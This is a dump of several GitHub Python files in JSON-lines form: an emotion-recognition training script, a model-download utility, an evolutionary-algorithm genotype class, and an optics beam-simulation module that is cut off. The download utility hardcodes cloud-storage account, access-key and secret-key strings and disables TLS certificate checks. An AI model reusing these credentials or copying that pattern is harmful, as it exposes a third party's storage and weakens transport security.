\"trained_model_{0}_epochs.h5\".format(nb_epoch)))\nprint(\"Model is saved!\")\n\n# Model evaluation\n\nprint(\"Evaluating the model...\")\nX_test = np.load(TEST_X_PATH).astype(np.float16)\n# Prepare data for evaluation\nX_test = np.reshape(X_test, (X_test.shape[0], 1, X_test.shape[1], X_test.shape[2]))\ny_test = to_categorical(np.load(TEST_Y_PATH).astype(np.uint8))\nmetrics = model.evaluate(X_test, y_test, batch_size=batch_size, verbose=1)\nprint(\"Metrics: {0}\".format(metrics))\nprint(\"Model loss: {0}\".format(metrics[0]))\nprint(\"Model acc: {0}\".format(metrics[1]))\n\n# Visualize the training\n\nplt.figure(figsize=(15, 10))\nplt.plot(hist.history['loss'])\nplt.title(\"Model loss\")\nplt.xlabel(\"epoch\")\nplt.legend(['loss'], loc='upper left')\nplt.savefig(os.path.join(VISUALIZATION_FOLDER_PATH, \"train_loss_visualization_{0}_epochs.png\".format(nb_epoch)))\n\nplt.figure(figsize=(15, 10))\nplt.plot(hist.history['acc'])\nplt.title(\"Model acc\")\nplt.xlabel(\"epoch\")\nplt.legend(['acc'], loc='upper left')\nplt.savefig(os.path.join(VISUALIZATION_FOLDER_PATH, \"train_acc_visualization_{0}_epochs.png\".format(nb_epoch)))\n","repo_name":"gaborvecsei/Emotion-Recognition","sub_path":"train_emotion_recognizer.py","file_name":"train_emotion_recognizer.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"27710896496","text":"# -*- encoding: utf-8 -*-\n'''\n@File : download.py\n@Time : 2022/06/05 17:08:29\n@Author : Ming Ding \n@Contact : dm18@mails.tsinghua.edu.cn\n'''\n\n# here put the import lib\nimport os\nimport sys\nimport math\nimport random\nimport requests\nimport threading\nfrom tqdm import tqdm\nfrom filelock import FileLock\nfrom .urls import MODEL_URLS\n\ndef download_with_progress_bar(save_path, url, chunk_size=2048):\n resume_header = None\n file_size_downloaded = 0\n\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\n\n if os.path.exists(save_path):\n file_size_downloaded = os.path.getsize(save_path)\n resume_header = {'Range': f'bytes={file_size_downloaded}-'}\n\n response = requests.get(url, stream=True, headers=resume_header)\n total_size = int(response.headers.get('content-length', 0)) + file_size_downloaded\n if total_size == file_size_downloaded:\n return\n \n with open(save_path, 'ab') as file:\n with tqdm(total=total_size, unit='B', unit_scale=True, desc=save_path, initial=file_size_downloaded) as pbar:\n for chunk in response.iter_content(chunk_size=chunk_size):\n if chunk:\n file.write(chunk)\n pbar.update(len(chunk))\n\ndef auto_create(name, *, path=None, url=None):\n if path is None:\n path = os.getenv('SAT_HOME', '~/.sat_models')\n path = os.path.expanduser(path)\n model_path = os.path.join(path, name)\n if url == 'local':\n return model_path\n os.makedirs(os.path.dirname(model_path), exist_ok=True)\n lock = FileLock(model_path + '.lock', mode=0o777)\n with lock:\n if url is None:\n url = MODEL_URLS[name]\n if os.path.isdir(model_path) and not url.startswith('r2://'):\n pass\n elif os.path.isdir(model_path) and url.startswith('r2://') and url.endswith('.zip'):\n pass\n else:\n print(f'Downloading models {url} into {path} ...')\n try:\n if url.startswith('r2://'):\n download_s3(path, url[5:])\n else:\n file_path = os.path.join(path, name + '.zip')\n download_with_progress_bar(file_path, url)\n except Exception as e:\n print(f'Failed to download or check, if you already had the zip file, please unzip it manually as {model_path}!')\n raise e\n # unzip\n if not os.path.isdir(model_path):\n import zipfile\n file_path = os.path.join(path, name + '.zip')\n print(f'Unzipping {file_path}...')\n f = zipfile.ZipFile(file_path, 'r')\n f.extractall(path=path)\n assert os.path.isdir(model_path), f'Unzip failed, or the first-level folder in zip is not {name}.'\n return model_path # must return outside the `with lock` block\n\nSAT_ACCOUNT = 'c8a00746a80e06c4632028e37de24d6e'\nSAT_ACCESS_KEY = 'eb4d69e273848089c7f9b9599cdcd983'\nSAT_SECRET_KEY = '367e9b21fef313f187026320016962b47b74ca4ada7d64d551c43c51e195d7a5'\nSAT_BUCKET = 'sat'\n\ndef download_s3(local_dir, remote_uri):\n '''Download remote_dir into (under) local_dir\n '''\n import boto3\n s3_resource = boto3.resource('s3',\n endpoint_url = f'https://{SAT_ACCOUNT}.r2.cloudflarestorage.com',\n aws_access_key_id = f'{SAT_ACCESS_KEY}',\n aws_secret_access_key = f'{SAT_SECRET_KEY}'\n )\n client = boto3.client('s3',\n endpoint_url = f'https://{SAT_ACCOUNT}.r2.cloudflarestorage.com',\n aws_access_key_id = f'{SAT_ACCESS_KEY}',\n aws_secret_access_key = f'{SAT_SECRET_KEY}',\n verify=False\n )\n bucket = s3_resource.Bucket(SAT_BUCKET) \n transfer_config = boto3.s3.transfer.TransferConfig(\n use_threads=True,\n multipart_threshold=8*1024*1024,\n max_concurrency=64,\n multipart_chunksize=8*1024*1024,\n )\n # remote_uri is file\n if '.' in os.path.basename(remote_uri):\n bucket.download_file(remote_uri, os.path.join(local_dir, os.path.basename(remote_uri)),Callback=ProgressPercentage(client, SAT_BUCKET, remote_uri), Config=transfer_config)\n return \n # uri is path\n remote_dir = remote_uri\n key_prefix = remote_dir.split('/')[:-1]\n for obj in bucket.objects.filter(Prefix = remote_dir):\n key_suffix = obj.key[len(key_prefix):] # remote_dir/xxx/xxx.zip\n target_dir = os.path.join(local_dir, os.path.dirname(key_suffix))\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n # skip if exists\n if os.path.exists(os.path.join(local_dir, key_suffix)) and os.path.getsize(os.path.join(local_dir, key_suffix)) == obj.size:\n continue\n bucket.download_file(obj.key, os.path.join(local_dir, key_suffix),Callback=ProgressPercentage(client, SAT_BUCKET, obj.key), Config=transfer_config) \n\n\nclass ProgressPercentage(object):\n ''' Progress Class\n Class for calculating and displaying download progress\n '''\n def __init__(self, client, bucket, filename):\n ''' Initialize\n initialize with: file name, file size and lock.\n Set seen_so_far to 0. Set progress bar length\n '''\n self._filename = filename\n self._size = client.head_object(Bucket=bucket, Key=filename)['ContentLength']\n self._seen_so_far = 0\n self._lock = threading.Lock()\n self.prog_bar_len = 80\n\n def __call__(self, bytes_amount):\n ''' Call\n When called, increments seen_so_far by bytes_amount,\n calculates percentage of seen_so_far/total file size \n and prints progress bar.\n '''\n # To simplify we'll assume this is hooked up to a single filename.\n with self._lock:\n self._seen_so_far += bytes_amount\n ratio = round((float(self._seen_so_far) / float(self._size)) * (self.prog_bar_len - 6), 1)\n current_length = int(round(ratio))\n\n percentage = round(100 * ratio / (self.prog_bar_len - 6), 1)\n\n bars = '+' * current_length\n output = bars + ' ' * (self.prog_bar_len - current_length - len(str(percentage)) - 1) + str(percentage) + '% ' + self.convert_bytes(self._seen_so_far) + ' / ' + self.convert_bytes(self._size) + ' ' * 5\n\n if self._seen_so_far != self._size:\n sys.stdout.write(output + '\\r')\n else:\n sys.stdout.write(output + '\\n')\n sys.stdout.flush()\n\n def convert_bytes(self, num):\n ''' Convert Bytes\n Converts bytes to scaled format (e.g KB, MB, etc.)\n '''\n step_unit = 1000.0\n for x in ['bytes', 'KB', 'MB', 'GB', 'TB', 'PB']:\n if num < step_unit:\n return \"%3.1f %s\" % (num, x)\n num /= step_unit\n \n","repo_name":"THUDM/SwissArmyTransformer","sub_path":"sat/resources/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","stars":743,"dataset":"github-code","pt":"52"} +{"seq_id":"30856216654","text":"import random\nfrom random import randint\nfrom typing import Tuple, Optional, List\n\nimport numpy as np\n\nfrom evolutionary_optimization.genotype.genotype_model.abstract_genotype import AbstractGenotype\nfrom evolutionary_optimization.genotype.genotype_model.genotype_utils import single_point_crossover\n\n\nclass IntegerListGenotype(AbstractGenotype):\n\n def __init__(\n self,\n genotype: Optional[List[int]] = None,\n mutation_probability: float = 0.1,\n ratio_of_population_for_crossover: float = 0.5,\n number_of_genes: int = 1,\n value_range: Tuple[int, int] = (-10000, 10000),\n ):\n \"\"\"Initialise instance of AbstractGenotype.\n\n Args:\n genotype: genotype used for mutation, crossover and to calculate phenotype_value.\n mutation_probability: probability of a gene mutating.\n ratio_of_population_for_crossover: ratio of population used for crossover when updating population.\n number_of_genes: number of genes in the genotype.\n value_range: minimum and maximum values of a gene.\n \"\"\"\n self._genotype = genotype\n self.mutation_probability = mutation_probability\n self.ratio_of_population_for_crossover = ratio_of_population_for_crossover\n self.number_of_genes = number_of_genes\n self.value_range = value_range\n\n @property\n def genotype(self):\n \"\"\"Genotype value used for evaluation of phenotype.\"\"\"\n return self._genotype\n\n @genotype.setter\n def genotype(self, value):\n \"\"\"Genotype attribute setter.\"\"\"\n self._genotype = value\n\n @classmethod\n def build_random_genotype(\n cls,\n number_of_genes: int = 1,\n value_range: Tuple[int, int] = (-10000, 10000),\n mutation_probability: Optional[float] = 0.5,\n ratio_of_population_for_crossover: Optional[float] = 0.5,\n ) -> \"IntegerListGenotype\":\n \"\"\"Builds random genotype attribute based on requirements.\n\n Args:\n number_of_genes: number of genes in the genotype.\n value_range: minimum and maximum values of a gene.\n mutation_probability: probability of a gene mutating.\n ratio_of_population_for_crossover: ratio of population used for crossover when updating population.\n\n Returns:\n Genotype object with updated genotype attribute.\n\n Todo:\n * (Marta): set infinity as value range defaults\n \"\"\"\n genotype = []\n\n for i in range(number_of_genes):\n new_gene = randint(value_range[0], value_range[1])\n genotype.append(new_gene)\n\n return cls(\n genotype=genotype,\n mutation_probability=mutation_probability,\n ratio_of_population_for_crossover=ratio_of_population_for_crossover,\n number_of_genes=number_of_genes,\n value_range=value_range,\n )\n\n @classmethod\n def from_genotype(cls, base_genotype: \"IntegerListGenotype\", new_genotype: List[int]) -> \"IntegerListGenotype\":\n \"\"\"Create a new genotype using the parameters of an existing genotype.\"\"\"\n return cls(\n genotype=new_genotype,\n value_range=base_genotype.value_range,\n mutation_probability=base_genotype.mutation_probability,\n ratio_of_population_for_crossover=base_genotype.ratio_of_population_for_crossover,\n )\n\n def mutate(self):\n \"\"\"In place modification of the genotype by randomly changing genes based on mutation probability.\"\"\"\n new_genotype = []\n\n for gene in self.genotype:\n mutation = np.random.choice([True, False], p=[self.mutation_probability, 1 - self.mutation_probability])\n\n if mutation:\n noise = random.uniform(-1, 1)\n if noise > 0:\n new_gene = gene + 1\n else:\n new_gene = gene - 1\n else:\n new_gene = gene\n\n new_genotype.append(new_gene)\n self.genotype = new_genotype\n\n def crossover(\n self,\n parent_2_genotype: \"IntegerListGenotype\",\n ) -> Tuple[\"IntegerListGenotype\", \"IntegerListGenotype\"]:\n \"\"\"Performs single point crossover operation for 1 set of parents.\n\n A random integer is generated to split the genotype of the two individuals -\n this is the gene slice index. Then two child genotypes are generated with the complementary parts\n of the parent genotypes. If the parent's genotype length is 1, crossover is impossible so the parent\n instances are returned.\n\n Example:\n parent_1.genotype = [1, 2, 3, 4]\n parent_2.genotype = [A, B, C, D]\n gene_slice_index = 1\n\n child_1.genotype = [1, B, C, D]\n child_2.genotype = [A, 2, 3, 4]\n\n Args:\n parent_2_genotype: Individual which will be used to create an offspring.\n\n Returns:\n Tuple of AbstractGenotype, representing two children genotypes that are a combination of the parents.\n \"\"\"\n if len(self.genotype) != len(parent_2_genotype.genotype):\n raise NameError(\"The Individuals have genotypes of different lengths - crossover is impossible\")\n\n if self.number_of_genes == 1:\n return self, parent_2_genotype\n else:\n last_slice_index = self.number_of_genes - 1\n gene_slice_index = randint(1, last_slice_index)\n\n child_1_genotype = single_point_crossover(self.genotype, parent_2_genotype.genotype, gene_slice_index)\n child_2_genotype = single_point_crossover(parent_2_genotype.genotype, self.genotype, gene_slice_index)\n\n child_1 = self.from_genotype(parent_2_genotype, child_1_genotype)\n child_2 = self.from_genotype(parent_2_genotype, child_2_genotype)\n\n return child_1, child_2\n","repo_name":"mwolinska/Evolutionary-Optimization","sub_path":"evolutionary_optimization/genotype/implemented_genotypes/integer_list_genotype.py","file_name":"integer_list_genotype.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"69878697444","text":"# -*- coding: utf-8 -*-\n\"\"\"Beam module belonging to optical forces master degree project\n\nThis module provides classes which defines some optical beams, like\nBessel beam or Frozen Waves. Until now, we have these beams implemented:\n - Plane Wave\n - Bessel Beam\n - Gaussian Beam\n - Bessel-Gauss Beam\n - Bessel-Gauss Beam superposition\n - Frozen Waves\n\nExample:\n ...\n\nTodo:\n * Create all docstrings\n\n.. Project:\n https://github.com/arantespp/opticalforces\n\n\"\"\"\n\nimport math as ma\nfrom math import pi\nimport cmath as cm\nimport copy\nimport scipy.special as ss\nfrom scipy.integrate import quad\nimport numpy as np\n\n\n# Speed of light.\nSPEED_OF_LIGHT = 299792458\nVACUUM_PERMEABILITY = pi*4e-7\n\n\ndef derivative(func, x0):\n '''This method makes the phase derivative in x, y and z using Fi-\n nite Difference Coefficients found on\n http://web.media.mit.edu/~crtaylor/calculator.html site.'''\n\n # Delta\n h = 1e-9\n\n # Denominator coefficient\n den = 12*h\n\n # Locations of Sampled Points\n lsp = [-2, -1, 1, 2,]\n\n # Finite Difference Coefficients\n fdc = [1, -8, 8, -1]\n\n # Delta\n '''h = 1e-9\n\n # Denominator coefficient\n den = 60*h\n\n # Locations of Sampled Points\n lsp = [-3, -2, -1, 0, 1, 2, 3]\n\n # Finite Difference Coefficients\n fdc = [-1, 9, -45, 0, 45, -9, 1]'''\n\n return np.dot(fdc, [func(x0+i*h) for i in lsp])/den\n\n\nclass Beam(object):\n \"\"\" This class has all properties and methods that a specific scalar\n beam should have.\n\n \"\"\"\n generic_params = ('_vacuum_wavelength',\n '_vacuum_wavenumber',\n '_medium_refractive_index',\n '_wavelength',\n '_wavenumber',)\n\n amp_pha_params = ('_amplitude',\n '_phase',)\n\n intrinsic_params = ()\n\n params = amp_pha_params + generic_params + intrinsic_params\n\n def __init__(self, beams, name='generic-scalar-beam'):\n self.beams = beams\n self.name = name\n\n if isinstance(beams, list) is True:\n self._vacuum_wavelength = beams[0].vacuum_wavelength\n self._vacuum_wavenumber = beams[0].vacuum_wavenumber\n self._medium_refractive_index = beams[0].medium_refractive_index\n self._wavelength = beams[0].wavelength\n self._wavenumber = beams[0].wavenumber\n else:\n self._vacuum_wavelength = None\n self._vacuum_wavenumber = None\n self._medium_refractive_index = None\n self._wavelength = None\n self._wavenumber = None\n\n self._amplitude = 1\n self._phase = 0\n\n def __str__(self):\n out = 'name: ' + self.name + '\\n'\n\n # print amplitude and phase\n for param in self.amp_pha_params:\n out += ' ' + param + ': ' + str(self.__dict__[param])\n out += '\\n'\n\n # print generic params\n for param in self.generic_params:\n out += ' ' + param + ': ' + str(self.__dict__[param])\n out += '\\n'\n\n for param in self.intrinsic_params:\n out += ' ' + param + ': ' + str(self.__dict__[param])\n out += '\\n'\n\n if len(self.beams) > 1:\n # print beams\n for i, beam in enumerate(self.beams):\n out += '\\n' + 'beam %d (%d)' %(i+1, i-len(self.beams)//2)\n out += ': %s' %beam.name\n out += '\\n'\n\n for param in beam.amp_pha_params:\n out += ' ' + param + ': ' + str(beam.__dict__[param])\n out += '\\n'\n\n for param in beam.intrinsic_params:\n out += ' ' + param + ': ' + str(beam.__dict__[param])\n out += '\\n'\n\n return out\n\n def __add__(self, other):\n # raise error if one generic params if different from another.\n if self.wavelength != other.wavelength:\n raise NameError('Beams with differents wavelength')\n if self.vacuum_wavelength != other.vacuum_wavelength:\n raise NameError('Beams with differents vacuum_wavelength')\n\n # effetuate the sum because all generic params are equal.\n beams = []\n\n for beam in self.beams:\n if len(self.beams) > 1:\n beam._amplitude *= self._amplitude\n beam._phase += self._phase\n beams.append(copy.copy(beam))\n\n for beam in other.beams:\n if len(other.beams) > 1:\n beam._amplitude *= other._amplitude\n beam._phase += other._phase\n beams.append(copy.copy(beam))\n\n return Beam(beams)\n\n @property\n def amplitude(self):\n return self._amplitude\n\n @amplitude.setter\n def amplitude(self, value):\n self._amplitude = value\n\n @property\n def phase(self):\n return self._phase\n\n @phase.setter\n def phase(self, value):\n self._phase = value\n\n # ----- vacuum -----\n\n @property\n def vacuum_wavelength(self):\n return self._vacuum_wavelength\n\n @vacuum_wavelength.setter\n def vacuum_wavelength(self, wl0):\n self._vacuum_wavelength = wl0\n\n if self.vacuum_wavenumber is None:\n self.vacuum_wavenumber = 2*pi/wl0\n\n if (self.medium_refractive_index is not None\n and self.wavelength is None):\n self.wavelength = wl0/self.medium_refractive_index\n\n if (self.medium_refractive_index is None\n and self.wavenumber is not None):\n self.medium_refractive_index = wl0*self.wavelength/(2*pi)\n\n @property\n def vacuum_wavenumber(self):\n return self._vacuum_wavenumber\n\n @vacuum_wavenumber.setter\n def vacuum_wavenumber(self, k0):\n self._vacuum_wavenumber = k0\n\n if self.vacuum_wavelength is None:\n self.vacuum_wavelength = 2*pi/k0\n\n if (self.medium_refractive_index is not None\n and self.wavenumber is None):\n self.wavenumber = k0*self.medium_refractive_index\n\n if (self.medium_refractive_index is None\n and self.wavelength is not None):\n self.medium_refractive_index = 2*pi/(k0*self.wavelength)\n\n # ----- medium -----\n\n @property\n def wavelength(self):\n return self._wavelength\n\n @wavelength.setter\n def wavelength(self, wl):\n self._wavelength = wl\n\n if self.wavenumber is None:\n self.wavenumber = 2*pi/wl\n\n if (self.medium_refractive_index is not None\n and self.vacuum_wavelength is None):\n self.vacuum_wavelength = wl*self.medium_refractive_index\n\n if (self.medium_refractive_index is None\n and self.vacuum_wavenumber is not None):\n k0 = self.vacuum_wavenumber\n self.medium_refractive_index = 2*pi/(wl*k0)\n\n @property\n def wavenumber(self):\n return self._wavenumber\n\n @wavenumber.setter\n def wavenumber(self, k):\n self._wavenumber = k\n\n if self.wavelength is None:\n self.wavelength = 2*pi/k\n\n if (self.medium_refractive_index is not None\n and self.vacuum_wavenumber is None):\n self.vacuum_wavenumber = k/self.medium_refractive_index\n\n if (self.medium_refractive_index is None\n and self.vacuum_wavelength is not None):\n self.medium_refractive_index = (k*self.vacuum_wavelength/(2*pi))\n\n # ----- medium refractive index -----\n\n @property\n def medium_refractive_index(self):\n return self._medium_refractive_index\n\n @medium_refractive_index.setter\n def medium_refractive_index(self, nm):\n self._medium_refractive_index = nm\n\n if (self.vacuum_wavelength is None\n and self.wavelength is not None):\n self.vacuum_wavelength = self.wavelength*nm\n\n if (self.vacuum_wavelength is not None\n and self.wavelength is None):\n self.wavelength = self.vacuum_wavelength/nm\n\n if (self.vacuum_wavenumber is None\n and self.wavenumber is not None):\n self.vacuum_wavenumber = self.wavenumber/nm\n\n if (self.vacuum_wavenumber is not None\n and self.wavenumber is None):\n self.wavenumber = self.vacuum_wavenumber*nm\n\n def is_all_params_defined(self):\n for param, value in self.__dict__.items():\n if value is None and param[0] == '_':\n return False\n return True\n\n def psi(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.psi(x1, x2, x3, system) for beam in self.beams]))\n\n def intensity(self, x1, x2, x3, system='cartesian'):\n \"\"\" Wave's intensity.\n\n Args:\n\n Returns:\n Wave's intensity.\n\n \"\"\"\n return abs(self.psi(x1, x2, x3, system))**2\n\n def wavenumber_direction(self, x1, x2, x3, system='cartesian'):\n \"\"\" k0 vector's direction.\n\n k0 vector's direction is defined by gradient of phase function.\n\n Args:\n point (:obj:'Point'): point at which want to calculate\n wave's k0 vector's direction.\n\n Returns:\n A list containing the normalized k0 vector - [kx, ky, kz]\n \"\"\"\n\n # k0 components\n (x0, y0, z0) = Point(x1, x2, x3, system).cartesian()\n psi = self.psi(x0, y0, z0, system)\n k0x = (derivative(lambda x: self.psi(x, y0, z0, system), x0)/psi).imag\n k0y = (derivative(lambda y: self.psi(x0, y, z0, system), y0)/psi).imag\n k0z = (derivative(lambda z: self.psi(x0, y0, z, system), z0)/psi).imag\n\n if (ma.isinf(k0x) is True\n or ma.isinf(k0y) is True\n or ma.isinf(k0z) is True):\n return (0, 0, 0)\n\n if (ma.isnan(k0x) is True\n or ma.isnan(k0y) is True\n or ma.isnan(k0z) is True):\n return (0, 0, 0)\n\n # normalize k0 vector\n if k0x != 0 or k0y != 0 or k0z != 0:\n k = [k0x, k0y, k0z]\n absk = np.linalg.norm(k)\n return (k0x/absk, k0y/absk, k0z/absk)\n return (0, 0, 0)\n\n def electric_field_direction(self, x1, x2, x3, system='cartesian'):\n return [0, 1, 0]\n\n\nclass ScalarPlaneWave(Beam):\n intrinsic_params = ()\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, **kwargs):\n Beam.__init__(self, self)\n\n self.beams = [self]\n self.name = 'scalar-plane-wave'\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n def psi(self, x1, x2, x3, system='cartesian'):\n \"\"\" Wave's equation 'psi'.\n\n Args:\n\n Returns:\n Wave's equation complex value of default plane wave decla-\n red on beam class.\n\n \"\"\"\n if system == 'cartesian' or system == 'cylindrical':\n z = x3\n else:\n z = Point(x1, x2, x3, system).z\n\n return (self._amplitude*cm.exp(1j*self._phase)\n *cm.exp(-1j*self._wavenumber*z))\n\n\nclass ScalarBesselBeam(Beam):\n intrinsic_params = ('_longitudinal_wavenumber',\n '_transversal_wavenumber',\n '_bessel_spot',\n '_axicon_angle',\n '_axicon_angle_degree',\n '_bessel_order',)\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, **kwargs):\n Beam.__init__(self, self)\n\n self.beams = [self]\n self.name = 'scalar-bessel-beam'\n\n self._transversal_wavenumber = None\n self._longitudinal_wavenumber = None\n self._bessel_spot = None\n self._axicon_angle = None\n self._axicon_angle_degree = None\n self._bessel_order = 0\n\n # use to determine which variable was setted first\n self.spot_krho_first = None\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n @property\n def wavenumber(self):\n return self._wavenumber\n\n @wavenumber.setter\n def wavenumber(self, k):\n self._wavenumber = k\n\n if self.wavelength is None:\n self.wavelength = 2*pi/k\n\n if (self.medium_refractive_index is not None\n and self.vacuum_wavenumber is None):\n self.vacuum_wavenumber = k/self.medium_refractive_index\n\n if (self.medium_refractive_index is None\n and self.vacuum_wavelength is not None):\n self.medium_refractive_index = (k*self.vacuum_wavelength/(2*pi))\n\n if self.longitudinal_wavenumber is not None:\n kz = self.longitudinal_wavenumber\n\n if self.transversal_wavenumber is None:\n self.transversal_wavenumber = ma.sqrt(k**2 - kz**2)\n\n if self.axicon_angle is None:\n self.axicon_angle = ma.acos(kz/k)\n\n if self.transversal_wavenumber is not None:\n krho = self.transversal_wavenumber\n\n if self.longitudinal_wavenumber is None:\n self.longitudinal_wavenumber = ma.sqrt(k**2 - krho**2)\n\n if self.axicon_angle is None:\n self.axicon_angle = ma.asin(krho/k)\n\n if self.axicon_angle is not None:\n theta = self.axicon_angle\n\n if self.longitudinal_wavenumber is None:\n self.longitudinal_wavenumber = k*ma.cos(theta)\n\n if self.transversal_wavenumber is None:\n self.transversal_wavenumber = k.ma.sin(theta)\n\n @property\n def longitudinal_wavenumber(self):\n return self._longitudinal_wavenumber\n\n @longitudinal_wavenumber.setter\n def longitudinal_wavenumber(self, kz):\n self._longitudinal_wavenumber = kz\n\n if self.transversal_wavenumber is not None:\n krho = self.transversal_wavenumber\n self.wavenumber = ma.sqrt(kz**2 + krho**2)\n\n if self.axicon_angle is not None:\n theta = self.axicon_angle\n if theta != pi/2:\n self.wavenumber = kz/ma.cos(theta)\n\n if self.wavenumber is not None:\n self.wavenumber = self.wavenumber\n\n\n @property\n def transversal_wavenumber(self):\n return self._transversal_wavenumber\n\n @transversal_wavenumber.setter\n def transversal_wavenumber(self, krho):\n self._transversal_wavenumber = krho\n\n if krho != 0:\n self._bessel_spot = ss.jn_zeros(self.bessel_order, 1)[0]/krho\n else:\n self._bessel_spot = ma.inf\n\n if self.longitudinal_wavenumber is not None:\n kz = self.longitudinal_wavenumber\n self.wavenumber = ma.sqrt(kz**2 + krho**2)\n\n if self.axicon_angle is not None:\n theta = self.axicon_angle\n if theta != 0:\n self.wavenumber = krho/ma.sin(theta)\n\n if self.wavenumber is not None:\n self.wavenumber = self.wavenumber\n\n @property\n def bessel_spot(self):\n return self._bessel_spot\n\n @bessel_spot.setter\n def bessel_spot(self, value):\n print('bessel_spot variable cannot be setted')\n\n @property\n def axicon_angle(self):\n return self._axicon_angle\n\n @axicon_angle.setter\n def axicon_angle(self, theta):\n if theta < 0:\n raise ValueError('theta value error: it is negative')\n if theta > pi/2:\n raise ValueError('theta value error: it is greater than pi/2')\n\n self._axicon_angle = theta\n self._axicon_angle_degree = 180*theta/pi\n\n if self.longitudinal_wavenumber is not None:\n kz = self.longitudinal_wavenumber\n if theta != pi/2:\n self.wavenumber = kz/ma.cos(theta)\n\n if self.transversal_wavenumber is not None:\n krho = self.transversal_wavenumber\n if theta != 0:\n self.wavenumber = krho/ma.sin(theta)\n\n if self.wavenumber is not None:\n self.wavenumber = self.wavenumber\n\n @property\n def axicon_angle_degree(self):\n return self._axicon_angle_degree\n\n @axicon_angle_degree.setter\n def axicon_angle_degree(self, value):\n self._axicon_angle_degree = value\n self.axicon_angle = value*pi/180\n\n @property\n def bessel_order(self):\n return self._bessel_order\n\n @bessel_order.setter\n def bessel_order(self, value):\n self._bessel_order = value\n krho = self.transversal_wavenumber\n if krho != 0:\n self._bessel_spot = ss.jn_zeros(value,1)[0]/krho\n else:\n self._bessel_spot = ma.inf\n\n def psi(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n return (self._amplitude*cm.exp(1j*self._phase)\n *ss.jv(self._bessel_order,\n self._transversal_wavenumber*rho)\n * cm.exp(-1j*self._longitudinal_wavenumber*z)\n * cm.exp(1j*self._bessel_order*phi))\n\n\nclass ScalarGaussianBeam(Beam):\n intrinsic_params = ('_q',\n '_gaussian_spot',\n '_rayleigh_range',)\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, **kwargs):\n Beam.__init__(self, self)\n\n self.beams = [self]\n self.name = 'scalar-gaussian-beam'\n\n self._q = None\n self._gaussian_spot = None\n self._rayleigh_range = None\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n @property\n def q(self):\n return self._q\n\n @q.setter\n def q(self, value):\n self._q = value\n if value == 0:\n self.gaussian_spot = ma.inf\n elif cm.isinf(value):\n self.gaussian_spot = 0\n else:\n self.gaussian_spot = ma.sqrt(1/value.real)\n\n @property\n def gaussian_spot(self):\n return self._gaussian_spot\n\n @gaussian_spot.setter\n def gaussian_spot(self, value):\n self._gaussian_spot = value\n self._rayleigh_range = pi*value**2/self._wavelength\n\n if self._q is not None:\n return\n\n if value == 0:\n self._q = ma.inf\n elif ma.isinf(value):\n self._q = 0\n else:\n self._q = 1/value**2\n\n @property\n def rayleigh_range(self):\n return self._rayleigh_range\n\n @rayleigh_range.setter\n def rayleigh_range(self, value):\n self._rayleigh_range = value\n self.gaussian_spot = ma.sqrt(value*self._wavelength/pi)\n\n def waist_radius(self, x1, x2, x3, system='cartesian'):\n point = Point(x1, x2, x3, system)\n if self.rayleigh_range == 0:\n return ma.inf\n return self._gaussian_spot*ma.sqrt(1+(point.z/self.rayleigh_range)**2)\n\n def fwhm(self, x1, x2, x3, system='cartesian'):\n point = Point(x1, x2, x3, system)\n return self.waist_radius(point)*ma.sqrt(2*ma.log(2))\n\n def curvature_radius(self, x1, x2, x3, system='cartesian'):\n point = Point(x1, x2, x3, system)\n if point.z == 0:\n return ma.inf\n return point.z*(1+(self.rayleigh_range/point.z)**2)\n\n def gouy_phase(self, x1, x2, x3, system='cartesian'):\n point = Point(x1, x2, x3, system)\n if self.rayleigh_range == 0:\n return pi\n return ma.atan(point.z/self.rayleigh_range)\n\n def psi(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n k = self._wavenumber\n q = self._q\n return (self._amplitude*cm.exp(1j*self._phase)\n * (1/(1+1j*z*2*q/k))*cm.exp(+1j*z*k)\n * cm.exp((-q*rho**2)/(1+1j*z*2*q/k)))\n\n\nclass ScalarBesselGaussBeam(ScalarBesselBeam, ScalarGaussianBeam):\n intrinsic_params = ScalarBesselBeam.intrinsic_params\n intrinsic_params += ScalarGaussianBeam.intrinsic_params\n params = Beam.params + intrinsic_params\n\n def __init__(self, **kwargs):\n ScalarBesselBeam.__init__(self)\n ScalarGaussianBeam.__init__(self)\n\n self.beams = [self]\n self.name = 'scalar-bessel-gauss-beam'\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n def psi(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n q = self._q\n k = self._wavenumber\n krho = self._transversal_wavenumber\n\n if z != 0:\n Q = q + 1j*k/(2*z)\n num = 1j*k/(2*z*Q)\n exp1 = cm.exp(-1j*k*(z+rho**2/(2*z)))\n bessel = ss.jv(0, num*krho*rho)\n exp2 = cm.exp(-(krho**2 + k**2*rho**2/z**2)/(4*Q))\n if ma.isinf(bessel.real) is True:\n value = ss.jv(0, krho*rho)*cm.exp(-q*rho**2)\n value = num*exp1*bessel*exp2\n else:\n value = ss.jv(0, krho*rho)*cm.exp(-q*rho**2)\n\n return self._amplitude*cm.exp(1j*self._phase)*value\n\n\nclass ScalarBesselGaussBeamSuperposition(ScalarBesselGaussBeam):\n intrinsic_params = ScalarBesselGaussBeam.intrinsic_params\n\n intrinsic_params += ('_N',\n 